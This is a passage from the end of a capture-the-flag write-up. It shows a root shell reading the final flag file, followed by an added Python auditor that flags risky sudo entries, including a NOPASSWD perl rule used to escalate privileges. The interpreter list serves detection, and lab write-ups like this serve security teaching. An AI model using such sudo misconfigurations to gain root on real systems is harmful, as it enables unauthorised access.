    final.txt
    root@ubuntu:~# cat final.txt
    cat final.txt
    
             ______   ______    _____   _     _  ______  
       /   (_____  |  ___   / ___  | |   | |(_____  
      /     _____) )| | _ | || |   | || |   | | _____) )
     / /  (_____ ( | || || || |   | || |   | |(_____ ( 
    | |__| |      | || || || || |___| || |___| |      | |
    |______|      |_||_||_||_| \_____/  \______|      |_|
                                                         
    
        IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}
    
    
    !! Congrats you have finished this task !!
    							
    Contact us here:
    								
    Hacking Articles : https://twitter.com/rajchandel/
    		
    AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
    	
    +-+-+-+-+-+ +-+-+-+-+-+-+-+
     |E|n|j|o|y| |H|A|C|K|I|N|G|
     +-+-+-+-+-+ +-+-+-+-+-+-+-+	
    root@ubuntu:~#
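
    The sudoers entry that ends this box is worth checking for systematically: a rule for a script interpreter is equivalent to a rule for ALL, whether or not NOPASSWD is set, because the interpreter runs whatever it is told to. The following added example (not code from the original write-up) parses `sudo -l` output and flags entries that are NOPASSWD, unrestricted (ALL), or point at a shell or interpreter. SAMPLE_SUDO_L is constructed from the `sudo -l` output above plus one made-up harmless entry (a systemctl restart) so the filter has something to leave alone; it assumes one "(runas) [TAG:] command" entry per line, which is how sudo prints them.

```python
"""Audit `sudo -l` output for entries that hand over a shell.

Added example, not part of the original write-up. SAMPLE_SUDO_L is constructed
from the `sudo -l` output above plus one made-up harmless entry. The parser
assumes one "(runas) [TAG:] command" entry per line.
"""
import os
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for aarti on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User aarti may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
"""

# Shells and script interpreters: a sudo rule for one of these is effectively a rule for ALL.
INTERPRETERS = {"sh", "bash", "dash", "perl", "python", "python3"}

ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
COMMANDS_HEADER = re.compile(r"^User \S+ may run the following commands")


def parse_sudo_l(text):
    """Return the command entries listed under the 'may run the following commands' header."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if COMMANDS_HEADER.match(line):
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY.match(line)
        if m is None:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]   # e.g. ["NOPASSWD"]
        entries.append({"runas": m.group("runas"), "tags": tags, "command": m.group("cmd")})
    return entries


def audit_sudo(entries):
    """Map each risky command to the list of reasons it was flagged."""
    findings = {}
    for e in entries:
        reasons = []
        if "NOPASSWD" in e["tags"]:
            reasons.append("NOPASSWD")
        program = e["command"].split()[0]
        if program == "ALL":
            reasons.append("unrestricted")
        elif os.path.basename(program) in INTERPRETERS:
            reasons.append("interpreter")
        if reasons:
            findings[e["command"]] = reasons
    return findings


if __name__ == "__main__":
    for cmd, reasons in audit_sudo(parse_sudo_l(SAMPLE_SUDO_L)).items():
        print(f"{cmd}: {', '.join(reasons)}")
```

    On the sample only the perl entry is reported, with both reasons; the systemctl entry is left alone because it is password-protected and limited to one fixed command. The fix on the box side is to remove the interpreter rule entirely, since no argument restriction can make it safe.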
    
  • Original post: https://www.cnblogs.com/Kali-Team/p/12212396.html